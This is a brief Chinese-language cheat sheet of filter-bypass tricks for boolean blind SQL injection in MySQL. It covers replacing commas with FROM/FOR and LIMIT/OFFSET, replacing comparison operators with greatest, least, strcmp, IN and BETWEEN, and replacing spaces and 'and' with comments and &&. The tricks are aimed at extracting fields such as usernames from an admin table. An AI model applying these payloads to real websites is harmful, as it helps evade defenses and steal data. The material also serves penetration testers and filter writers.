布尔盲注绕过技巧
-
过滤逗号绕过技巧
在进行盲注过程中,可能需要 substr(),mid(),limit等函数或操作符,此时要用到逗号。如果逗号被过滤可以使用以下技巧。
mid(username,1,1) 等价于 mid(username from 1 for 1) substr(username,1,1) 等价于 substr(username from 1 for 1) select * from admin limit 0,1等价于select * from admin limit 1 offset 0 -
在进行盲注过程中,需要适用大于或这小于比较运算符。如果过滤,可以使用以下技巧
greatest(n1,n2,n3...) #返回n中的最大值 greatest(ascii(substr(username,1,1)),1)=97 least(n1,n2,n3) #返回n中最小值 strcmp(str1,str2) #若所有字符串均相同,则返回0,若根据当前分类次序,第一个小于第二个,则返回-1,其他情况返回1 substr(username,1,1) in ('t') #可以用来代替= between a and b #范围在a-b之间 and substr(username,1,1) between 'a' and 't'; and substr(username,1,1) between 't' and 't' -
如果空格被过滤可以使用
/**/来替代,&&代替and